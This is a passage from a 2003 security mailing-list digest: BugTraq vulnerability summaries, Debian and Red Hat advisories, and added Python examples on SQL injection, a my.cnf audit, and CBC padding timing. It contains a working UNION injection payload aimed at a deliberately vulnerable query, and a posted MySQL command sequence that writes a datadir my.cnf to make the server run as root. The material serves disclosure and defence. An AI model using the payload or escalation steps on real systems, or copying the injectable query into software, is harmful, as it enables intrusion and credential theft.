least, it is possible to compromise the PHP-Nuke web portal. SQL
injection also makes it possible, under some circumstances, to exploit
vulnerabilities that may exist in the database implementation.
This BID will be divided into separate BIDs for each distinct issue and
retired when further analysis of these vulnerabilities is complete.
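The injection class reported for the PostNuke Members_List module above (item 8) and for the PHP-Nuke Forums and Private_Messages scripts here, as one added example that is not either project's code: a member-listing query built by string formatting beside the parameterised form. The table, the rows (dummy hashes) and the function names are constructed for this example.

```python
"""Added example: string-built SQL versus a parameterised query, on a
constructed in-memory table standing in for a portal's user table."""
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed data; the 'pass' values are dummies, not real hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nuke_users (uid INTEGER PRIMARY KEY, uname TEXT, pass TEXT)")
    conn.executemany("INSERT INTO nuke_users (uname, pass) VALUES (?, ?)", [
        ("alice", "5f4dcc3b5aa765d6"),
        ("bob", "e10adc3949ba59ab"),
        ("carol", "d8578edf8458ce06"),
    ])
    return conn


def members_list_vulnerable(conn, letter: str):
    """The fault: the request parameter is spliced into the SQL text, so a
    quote in it ends the literal and the rest is parsed as SQL."""
    sql = "SELECT uname FROM nuke_users WHERE uname LIKE '%s%%'" % letter
    return [row[0] for row in conn.execute(sql)]


def members_list_fixed(conn, letter: str):
    """Parameterised: the value can never terminate the string literal.
    LIKE wildcards inside the input are escaped so they match literally."""
    escaped = (letter.replace("\\", "\\\\")
                     .replace("%", "\\%")
                     .replace("_", "\\_"))
    sql = "SELECT uname FROM nuke_users WHERE uname LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, (escaped + "%",))]


# A constructed payload of the kind the summaries describe: close the
# literal, UNION in another column, comment out the trailing "%'".
UNION_PAYLOAD = "x' UNION SELECT pass FROM nuke_users--"
```

Run against the vulnerable function, the payload returns the password column instead of user names; against the fixed one it is just a string that no user name begins with, and the result is empty.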
23. VPOPMail vpopmail.php Remote Command Execution Vulnerability
BugTraq ID: 7063
Remote: Yes
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7063
Summary:
VPOPMail is a plugin designed for use with SquirrelMail. It is
implemented in PHP and allows a user to manage a qmail system with
virtual domains.
A vulnerability has been reported for VPOPMail that may allow attackers
to execute arbitrary commands on a vulnerable system. The vulnerability
exists due to insufficient sanitization of user-supplied input.
As the vpopmail.php script does not properly sanitize the values for the
'$vpasswd', '$username' and '$pwd' variables, it is possible for an
attacker to include malicious system commands by manipulating URI
parameters. This will result in the execution of the attacker-supplied
commands with the privileges of the web server.
This vulnerability was reported for VPOPMail 0.97 and earlier.
24. HP VVOS 11.04 HFS Unauthorized Access Vulnerability
BugTraq ID: 7065
Remote: No
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7065
Summary:
Virtual Vault Operating System (VVOS) is a commercially-available
operating system distributed by HP.
HP has announced a vulnerability in the HP VVOS HFS file system that may
result in unauthorized file access by malicious parties. Unauthorized
access to files may allow for disclosure of sensitive information or
other consequences.
HP has not released further technical details about the nature of this
vulnerability. If further details do become available, this BID will be
updated.
25. Sun SUNWlldap Library Hostname Buffer Overflow Vulnerability
BugTraq ID: 7064
Remote: Yes
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7064
Summary:
The SUNWlldap package, available for Sun Solaris x86, includes various
LDAP clients and an LDAP client library used to provide programmatic
access to the LDAP protocol.
The SUNWlldap package has been reported vulnerable to a buffer overflow
condition.
Reportedly if LDAP is enabled in the '/etc/nsswitch.conf' system file, an
application that is linked to the LDAP shared library may be affected by
this vulnerability.
Using an affected application to resolve a malicious hostname of
excessive length can trigger the overflow. This condition is likely due
to insufficient bounds checking: when the hostname is processed, a buffer
is overrun and sensitive locations in memory are overwritten.
Exploitation of this vulnerability may lead to arbitrary code execution
within the context of the application utilizing the vulnerable LDAP
library.
It should be noted that, although it has not been confirmed, the
vulnerability might occur in the getbyname() function.
This vulnerability has been reported to affect 'SUNWlldap 11.8.0';
previous versions may also be affected.
26. Man Program Unsafe Return Value Command Execution Vulnerability
BugTraq ID: 7066
Remote: No
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7066
Summary:
Man is a freely available, open source manual page program. It is
available mainly for Linux operating systems, though it can be used on
other UNIX operating system variants.
A problem with the program may make it possible to launch local attacks
on users through malicious man pages.
It has been reported that the man program does not properly handle some
types of input. When a man page is processed that could pose a potential
security risk, the program reacts in a way that may open a window of
opportunity for an attacker to execute arbitrary commands.
The problem is in the value returned by the man program when a
potentially dangerous man page is processed. The man program returns the
string 'unsafe', which is in turn passed to a system() call. If a program
named 'unsafe' is located in the user's PATH, it will be executed with the
privileges of the user running man.
27. Multitech RouteFinder Remote Memory Corruption Vulnerability
BugTraq ID: 7067
Remote: Yes
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7067
Summary:
A vulnerability has been discovered in Multitech RouteFinder 550 VPN
firmware release 4.63 and earlier. The problem occurs due to insufficient
bounds checking of data supplied in HTTP GET requests. Specifically, it
is possible to trigger the condition by sending a GET /OPTIONS request to
a vulnerable device, containing at least 10001 bytes of data.
Passing excessive data to the device may make it possible for a remote
attacker to corrupt memory.
Successful exploitation of this bug may result in a denial of service,
causing the device to crash. A manual restart would be required to
restore functionality.
Although it has not been confirmed, it may also be possible for an
attacker to exploit this issue to execute arbitrary commands.
28. SaveMyModem Statusbar_Set_Text Buffer Overflow Vulnerability
BugTraq ID: 7068
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7068
Summary:
SaveMyModem is mail filtering software. It is available for Microsoft
Windows and Unix and Linux platforms.
SaveMyModem is prone to a buffer overflow in the 'statusbar_set_text'
function. In some instances, this function will be called with
externally supplied data, such as when messages are processed. The
vulnerable function includes a call to vsnprintf() whose length argument
is that of the much larger source buffer rather than of the destination
buffer, so the length limit does not protect the destination.
When the vulnerable function is called with externally supplied data, it
may be possible to corrupt sensitive regions of data. This may
potentially occur if a message is processed with an excessively long
subject.
Successful exploitation will result in code execution in the context of
the SaveMyModem process.
29. HP J6038A JetDirect 310x Print Server For Fast Ethernet Unspecified Vulnerabilities
BugTraq ID: 7070
Remote: Yes
Date Published: Mar 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7070
Summary:
The HP JetDirect 310x is a series of network print servers.
Unspecified vulnerabilities have been reported by HP in J6038A JetDirect
310x Print Servers running version Q.24.06 firmware. Unauthorized access
to print servers may result from successful exploitation. A potential
for denial of service attacks has also been reported by the vendor.
HP has released a firmware upgrade in response.
This BID will be updated if further technical details become available.
III. SECURITYFOCUS NEWS AND COMMENTARY
--------------------------------------
1. Hi-Tech Surveillance Firm Prospers
By Kevin Poulsen
If you're under FBI surveillance, there's a good chance your phone calls
and Internet traffic are traveling over the equipment of Verint Systems
-- a company that's doing very well these days.
http://www.securityfocus.com/news/3115
2. Homeland Cybersecurity Efforts Doubted
By Michael Fitzgerald
As the new Department of Homeland Security swallows nearly every
cybersecurity office in the U.S. government, high-profile leaders are
jumping ship, and analysts worry that only meager funding and muddled
goals remain.
http://www.securityfocus.com/news/3043
3. RSA and Verisign beat SSL patent infringement rap
By John Leyden, The Register
An American jury has rejected claims by a retired Florida engineer that
RSA Security and VeriSign infringed his encryption patent.
http://www.securityfocus.com/news/3130
4. For sale: memory stick plus cancer patient records
By John Leyden, The Register
Health bosses in Lancashire are facing awkward questions after
confidential medical records of 13 cancer patients found their way onto a
portable memory stick, which was repackaged and sold as new to a Crewe
estate agent.
http://www.securityfocus.com/news/3129
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. KisMAC v0.04a
by mick
Relevant URL:
http://kismac.binaervarianz.de/
Platforms: MacOS
Summary:
KisMAC is a stumbler application for Mac OS X that puts your card into
monitor mode. Unlike most other applications for OS X, it is completely
invisible and sends no probe requests.
2. psmon v1.0.0
by perlguy
Relevant URL:
http://psmon.perlguy.org.uk/
Platforms: UNIX
Summary:
psmon is a Perl script which can be run as a stand-alone program or a
fully functional background daemon, capable of logging to syslog with
customisable email notification facilities. The user defines a set of
rules in an Apache-style plain text configuration file. These rules
describe what processes should always be running on the system, and any
limitations on concurrent instances, TTL, and maximum CPU/memory usage of
processes. psmon scans the UNIX process table and, using the set of rules
defined in the configuration file, will respawn any dead processes, and
slay or "deal with" any aggressive or illegal processes.
3. eXtended Allow - Deny list for PAM v0.4
by Adrian Ber berad-@yahoo.com
Relevant URL:
http://www.geocities.com/beradrian/soft/xad/index.html
Platforms: Linux, POSIX
Summary:
XAD is a very easy to configure PAM module. Through a very easy language
you can allow/deny access to users.
4. C-Kermit v8.0.208
by Frank da Cruz
Relevant URL:
http://www.columbia.edu/kermit/ckermit.html
Platforms: AIX, FreeBSD, HP-UX, Linux, MacOS, NetBSD, OpenBSD, SCO,
Solaris, SunOS
Summary:
C-Kermit is a combined serial and network communication software package
offering a consistent, medium-independent, cross-platform approach to
connection establishment, terminal sessions, file transfer, character-set
translation, numeric and alphanumeric paging, and automation of
communication tasks. Recent versions include FTP and HTTP clients as well
as an SSH interface, all of which can be scripted and aware of
character-sets. It supports built-in security methods, including Kerberos
IV, Kerberos V, SSL/TLS, and SRP, FTP protocol features such as MLSD, and
source-code parity with Kermit 95 2.1 for Windows and OS/2.
5. trafcalc v1.0
by cyberny
Relevant URL:
http://trafcalc.sourceforge.net/
Platforms: Linux, POSIX
Summary:
Trafcalc calculates the size of the TCP-payload on a system via packet
capturing and connection tracking at the user level instead of the IP
level.
6. lsh v1.5.1
by Niels Möller
Relevant URL:
http://www.lysator.liu.se/~nisse/lsh/
Platforms: POSIX
Summary:
lsh is a GNU GPL-licensed implementation of the SSH (version 2) protocol.
It includes a server, a client, and some utility programs.
V. SECURITY JOBS SUMMARY
------------------------
1. Looking for Disaster Recovery Analyst for Los Angeles CA (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314955
2. Any hints for Australia? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314961
3. Experienced Security Professional looking for Bay Area openings (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314962
4. Experienced Security Software consultant, CISSP (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314758
5. INFOSEC Systems Engineer (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314752
6. FW: IT Security Evangelist for Italy (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314721
7. Senior Security Engineer/Analyst (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314722
8. Senior Engineering Manager-Security (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314656
9. Systems Engineer-Chicago, Minneapolis, Houston and St. Louis (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314645
10. Information Security Manager, UK (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314653
11. Security Engineer (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314633
12. Security Awareness & Training Manager vacancy (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314664
13. Account Executive (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314632
14. Looking for a job in England (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314654
15. Sales Engineer, APac (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314435
16. Senior Level Security Consultant needed in DC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314441
17. RACF Project Sought - 20 Year Veteran Supporting RACF DB2 Database for Windows 2000 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314325
18. PFR Thread (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314231
VII. VULN-DEV RESEARCH LIST SUMMARY
----------------------------------
1. Outlook HTML crash (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314953
2. su core dumped with signal 3. BSD/OS 3.0, 3.1 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314952
3. Win32hlp exploit for : ":LINK overflow" (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314951
4. Apache 2.x leaked descriptors (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314923
5. gtali Segmentation fault (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314929
6. FW: Outlook HTML crash (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314939
7. Mordred Security Labs now online (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314927
8. xscreensaver exploit for Redhat 7.3 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314586
9. Windows Shellcode - Using Detached_Process flag (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314587
10. Why SUID Binary exploit does not yield root shell? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314446
11. /usr/sbin/sendmail (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314423
12. Fwd: Kazaa file corruption (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314273
VIII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. SQL Service Pack doesn't upgrade SQL Server (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314825
2. Exchange/MAPI/RPC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314807
3. DisableIPSourceRouting registry key (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314667
4. SecurityFocus Microsoft Newsletter #128 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314565
5. AW: Exchange/MAPI/RPC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314561
6. SV: DisableIPSourceRouting registry key (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314493
7. Worm.Dvldr analysis report (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314519
8. Article Announcement: Cryptographic Filesystems: Design and Implementation (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314351
9. Free SQL chapter available on www.SpecialOpsSecurity.com (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314324
10. AD replication - IP site to site encryption? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314292
11. User rights on Terminal Services (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314294
IX. SUN FOCUS LIST SUMMARY
----------------------------
1. Solaris disk wipe utilitiy? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314816
2. Sun Security Admin Beta Exam.... (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314652
3. SecurityFocus Article Announcement - Cryptographic Filesystems: Design and Implementation (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314555
4. Kernel modules (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314534
5. Administrivia (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314349
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. Port 113 security (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314827
2. Traffic Shaping. (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314730
3. SecurityFocus Article Announcement (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314566
XI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored By: NetIQ
Need security policies? Don't start from scratch..."Information Security
Policies Made Easy" is the best security policy resource guide you can
buy with 1300+ ready-to-use security policies that can be quickly
customized for any company. Build best practice security policies in
half the time and expense. Also check out "Information Security Roles &
Responsibilities Made Easy."
Download a free policy now at http://www.netiq.com/order/publications.asp
------------------------------------------------------------------------------
===============================================================================
End of Doc 2
===============================================================================
===============================================================================
3.) [SECURITY] [DSA 258-1] New ethereal packages fix arbitrary code execution
===============================================================================
--------------------------------------------------------------------------
Debian Security Advisory DSA 258-1                       secu-@debian.org
http://www.debian.org/security/                            Martin Schulze
March 10th, 2003                         http://www.debian.org/security/faq
--------------------------------------------------------------------------
Package : ethereal
Vulnerability : format string vulnerability
Problem-Type : remote
Debian-specific: no
CVE Id : CAN-2003-0081
Georgi Guninski discovered a problem in ethereal, a network traffic
analyzer. The program contains a format string vulnerability that
could probably lead to execution of arbitrary code.
For the stable distribution (woody) this problem has been fixed in
version 0.9.4-1woody3.
The old stable distribution (potato) does not seem to be affected by
this problem.
For the unstable distribution (sid) this problem has been fixed in
version 0.9.9-2.
We recommend that you upgrade your ethereal packages.
Upgrade Instructions
--------------------
wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody
--------------------------------
These files will probably be moved into the stable distribution on
its next revision.
---------------------------------------------------------------------------------
End of Doc 3
===============================================================================
===============================================================================
4.) MySQL user can be changed to root
===============================================================================
Hi. I tried this on my own MySQL 3.23.55 !!!
I found out that, logging in as the root user, we can change mysqld to run as root instead of, e.g., mysql, but this works only if there's just one my.cnf file and it is located in /etc...
Here's how I did it...
I logged in as root and then I did this:
mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT INTO hack VALUES ('[mysqld]');
mysql>INSERT INTO hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack;
mysql>QUIT
Doing so we have created a my.cnf in the mysql datadir containing:
[mysqld]
user=root
Now, when the mysql server is restarted, the user option in our datadir my.cnf will override the one in /etc/my.cnf and the mysql server will run as root, with all the security flaws that it entails...
This is very dangerous if we think that in mysql <= 3.23.53 it is really easy to get root access due to a bug (an exploit has been released publicly)...
I dunno how this problem can be solved, I'd like to hear something from you...
Thanks.... :)
by
Gufino
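An added audit script for the override described in the post above (this is not Gufino's code, nor MySQL's): it parses the option files in the order mysqld reads them, reports the user mysqld would end up running as, and flags an option file inside the datadir that the mysql service account can write. The file contents, paths and the writable-path set are constructed sample input; on a live host the writable check would be a stat()/os.access() call.

```python
"""Constructed audit of the my.cnf override path: MySQL reads /etc/my.cnf
first and DATADIR/my.cnf afterwards, so a later file's [mysqld] user= wins.
A my.cnf inside the datadir that the mysql account can write is the
condition worth flagging. All paths and contents are constructed samples."""
import re

_SECTION_RE = re.compile(r"^\[([^\]]+)\]$")


def parse_mycnf(text):
    """Minimal my.cnf parser: [section] headers, key=value or bare key lines,
    comments starting with '#' or ';'. Returns {section: {key: value}}.
    Dashes in option names are normalised to underscores (skip-networking
    and skip_networking are the same option)."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = _SECTION_RE.match(line)
        if m:
            section = m.group(1).strip().lower()
            conf.setdefault(section, {})
            continue
        if section is None:
            continue                       # options before any header are ignored
        key, _, value = line.partition("=")
        conf[section][key.strip().lower().replace("-", "_")] = value.strip()
    return conf


def effective_mysqld_user(option_files):
    """option_files: [(path, text), ...] in the order the server reads them;
    the last [mysqld] user= setting seen is the one mysqld runs as."""
    user = None
    for _path, text in option_files:
        user = parse_mycnf(text).get("mysqld", {}).get("user", user)
    return user


def audit(option_files, datadir, writable_by_mysql):
    """Return findings as strings. writable_by_mysql is the set of paths the
    mysql service account can write (constructed input here)."""
    findings = []
    inside_datadir = datadir.rstrip("/") + "/"
    for path, text in option_files:
        mysqld = parse_mycnf(text).get("mysqld", {})
        if mysqld.get("user") == "root":
            findings.append(f"{path}: [mysqld] user=root")
        if path.startswith(inside_datadir) and path in writable_by_mysql:
            findings.append(f"{path}: option file in datadir is writable by the mysql account")
    if effective_mysqld_user(option_files) == "root":
        findings.append("effective mysqld user is root")
    return findings


# Constructed sample: a sane /etc/my.cnf plus the datadir override from the post.
SAMPLE_ETC_MY_CNF = """# constructed /etc/my.cnf
[mysqld]
datadir=/var/lib/mysql
user=mysql
"""
SAMPLE_DATADIR_MY_CNF = """[mysqld]
user=root
"""


def demo():
    """Audit the constructed pair of files in read order."""
    files = [("/etc/my.cnf", SAMPLE_ETC_MY_CNF),
             ("/var/lib/mysql/my.cnf", SAMPLE_DATADIR_MY_CNF)]
    return audit(files, "/var/lib/mysql", {"/var/lib/mysql/my.cnf"})


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```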
===============================================================================
End of Doc #4
===============================================================================
===============================================================================
5.) [RHSA-2003:062-11] Updated OpenSSL packages fix timing attack
===============================================================================
---------------------------------------------------------------------
Red Hat, Inc. Red Hat Security Advisory
Synopsis: Updated OpenSSL packages fix timing attack
Advisory ID: RHSA-2003:062-11
Issue date: 2003-02-19
Updated on: 2003-03-06
Product: Red Hat Linux
Keywords:
Cross references:
Obsoletes: RHSA-2002:160
CVE Names: CAN-2003-0078
---------------------------------------------------------------------
1. Topic:
Updated OpenSSL packages are available that fix a potential timing-based
attack.
2. Relevant releases/architectures:
Red Hat Linux 6.2 - i386
Red Hat Linux 7.0 - i386
Red Hat Linux 7.1 - i386
Red Hat Linux 7.2 - i386, i686, ia64
Red Hat Linux 7.3 - i386, i686
Red Hat Linux 8.0 - i386, i686
3. Problem description:
OpenSSL is a commercial-grade, full-featured, and open source toolkit that
implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer
Security (TLS v1) protocols as well as a full-strength general purpose
cryptography library.
In a paper, Brice Canvel, Alain Hiltgen, Serge Vaudenay, and Martin
Vuagnoux describe and demonstrate a timing-based attack on CBC ciphersuites
in SSL and TLS. An active attacker may be able to use timing observations
to distinguish between two different error cases: cipher padding errors and
MAC verification errors. Over multiple connections this can leak
sufficient information to make it possible to retrieve the plaintext of a
common, fixed block.
In order for an attack to be successful, an attacker must be able to act as
a man-in-the-middle to intercept and modify multiple connections, which all
involve a common fixed plaintext block (such as a password), and have good
network conditions that allow small changes in timing to be reliably
observed.
These erratum packages contain a patch provided by the OpenSSL group that
corrects this vulnerability.
Because server applications are affected by these vulnerabilities, we
advise users to restart all services that use OpenSSL functionality or
alternatively reboot their systems after installing these updates.
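An added model of the receive-side check the problem description refers to (this is constructed example code, not the OpenSSL source or the patch): a verifier that returns as soon as the padding is wrong does less work than one that fails on the MAC, so the two error cases are distinguishable; a verifier that always computes a MAC and reports one error for both causes removes that coarse distinction. The HMAC-SHA1 MAC, the 8-byte block size, the sample key and records, and the "mac_ops" counter standing in for measured time are all assumptions of the example.

```python
"""Modelled receive-side check for a TLS 1.0 CBC record after block
decryption: body || HMAC-SHA1(body) || padding. Constructed for
illustration; not OpenSSL's code. 'counters' records how many MAC
computations each path performs, standing in for the time an observer
on the network would measure."""
import hashlib
import hmac

MAC_LEN = 20      # HMAC-SHA1 digest length, as in the *_CBC_SHA suites
BLOCK_SIZE = 8    # block size of a DES/3DES-style cipher


class BadRecord(Exception):
    """Raised for any integrity failure of a received record."""


def _mac(key, body):
    # Real TLS also MACs a sequence number and record header; omitted here.
    return hmac.new(key, body, hashlib.sha1).digest()


def _content_length(decrypted):
    """TLS padding: last byte is n, preceded by n bytes that also equal n.
    Returns the length of body||MAC, or None if the padding is malformed."""
    if not decrypted:
        return None
    n = decrypted[-1]
    if n + 1 > len(decrypted):
        return None
    if any(b != n for b in decrypted[-(n + 1):-1]):
        return None
    return len(decrypted) - n - 1


def build_record(key, body):
    """Sender side: append the MAC and pad to a whole number of blocks."""
    mac = _mac(key, body)
    n = (BLOCK_SIZE - (len(body) + MAC_LEN + 1) % BLOCK_SIZE) % BLOCK_SIZE
    return body + mac + bytes([n]) * (n + 1)


def verify_vulnerable(key, decrypted, counters):
    """Returns on a padding error before any MAC work is done, so a padding
    failure is measurably faster than a MAC failure."""
    counters["mac_ops"] = counters.get("mac_ops", 0)
    content_len = _content_length(decrypted)
    if content_len is None or content_len < MAC_LEN:
        raise BadRecord("bad padding")           # fast path: no MAC computed
    split = content_len - MAC_LEN
    body, mac = decrypted[:split], decrypted[split:content_len]
    counters["mac_ops"] += 1
    if not hmac.compare_digest(_mac(key, body), mac):
        raise BadRecord("bad mac")               # slow path: MAC computed
    return body


def verify_fixed(key, decrypted, counters):
    """Always computes a MAC, treating a badly padded record as unpadded,
    and reports a single error for both causes."""
    counters["mac_ops"] = counters.get("mac_ops", 0)
    content_len = _content_length(decrypted)
    padding_ok = content_len is not None and content_len >= MAC_LEN
    if not padding_ok:
        content_len = len(decrypted)             # pretend there is no padding
    split = max(content_len - MAC_LEN, 0)
    body, mac = decrypted[:split], decrypted[split:content_len]
    counters["mac_ops"] += 1                     # same work on every path
    mac_ok = hmac.compare_digest(_mac(key, body), mac)
    if not (padding_ok and mac_ok):
        raise BadRecord("bad record")            # one error, either cause
    return body


def demo(verify):
    """Run a verifier over a good record and the two error cases."""
    key = b"constructed-mac-key"
    good = build_record(key, b"password=hunter2")
    bad_pad = good[:-1] + bytes([0xFF])          # padding length byte corrupted
    bad_mac = bytes([good[0] ^ 1]) + good[1:]    # body corrupted, padding intact
    results = {}
    for name, record in (("good", good), ("bad_pad", bad_pad), ("bad_mac", bad_mac)):
        counters = {}
        try:
            verify(key, record, counters)
            outcome = "ok"
        except BadRecord as err:
            outcome = str(err)
        results[name] = (outcome, counters["mac_ops"])
    return results


if __name__ == "__main__":
    print("vulnerable:", demo(verify_vulnerable))
    print("fixed:     ", demo(verify_fixed))
```

The fixed path removes the coarse padding-versus-MAC distinction this advisory describes; the amount of data that is MACed still depends on the padding length, a finer difference that is outside the scope of this advisory.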
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
To update all RPMs for your particular architecture, run:
rpm -Fvh [filenames]
where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which are
not installed but included in the list will not be updated. Note that you
can also use wildcards (*.rpm) if your current directory *only* contains
the desired RPMs.
Please note that this update is also available via Red Hat Network. Many
people find this an easier way to apply updates. To use Red Hat Network,
launch the Red Hat Update Agent with the following command:
up2date
This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.
5. RPMs required:
Red Hat Linux 6.2:
SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/openssl-0.9.5a-30.src.rpm
i386:
ftp://updates.redhat.com/6.2/en/os/i386/openssl-0.9.5a-30.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/openssl-devel-0.9.5a-30.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/openssl-perl-0.9.5a-30.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/openssl-python-0.9.5a-30.i386.rpm
Red Hat Linux 7.0:
SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/openssl095a-0.9.5a-18.7.src.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/openssl-0.9.6-14.src.rpm
i386:
ftp://updates.redhat.com/7.0/en/os/i386/openssl095a-0.9.5a-18.7.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssl-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssl-devel-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssl-perl-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssl-python-0.9.6-14.i386.rpm
Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/openssl095a-0.9.5a-18.7.src.rpm
ftp://updates.redhat.com/7.1/en/os/SRPMS/openssl-0.9.6-14.src.rpm
i386:
ftp://updates.redhat.com/7.1/en/os/i386/openssl095a-0.9.5a-18.7.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssl-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssl-devel-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssl-perl-0.9.6-14.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssl-python-0.9.6-14.i386.rpm
Red Hat Linux 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/openssl095a-0.9.5a-18.7.src.rpm
ftp://updates.redhat.com/7.2/en/os/SRPMS/openssl096-0.9.6-13.7.src.rpm
ftp://updates.redhat.com/7.2/en/os/SRPMS/openssl-0.9.6b-30.7.src.rpm
i386:
ftp://updates.redhat.com/7.2/en/os/i386/openssl095a-0.9.5a-18.7.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssl096-0.9.6-13.7.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssl-0.9.6b-30.7.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssl-devel-0.9.6b-30.7.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssl-perl-0.9.6b-30.7.i386.rpm
i686:
ftp://updates.redhat.com/7.2/en/os/i686/openssl-0.9.6b-30.7.i686.rpm
ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/openssl095a-0.9.5a-18.7.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssl096-0.9.6-13.7.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssl-0.9.6b-30.7.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssl-devel-0.9.6b-30.7.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssl-perl-0.9.6b-30.7.ia64.rpm
Red Hat Linux 7.3:
SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/openssl095a-0.9.5a-18.7.src.rpm
ftp://updates.redhat.com/7.3/en/os/SRPMS/openssl096-0.9.6-13.7.src.rpm
ftp://updates.redhat.com/7.3/en/os/SRPMS/openssl-0.9.6b-30.7.src.rpm
i386:
ftp://updates.redhat.com/7.3/en/os/i386/openssl095a-0.9.5a-18.7.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssl096-0.9.6-13.7.i386.rpm
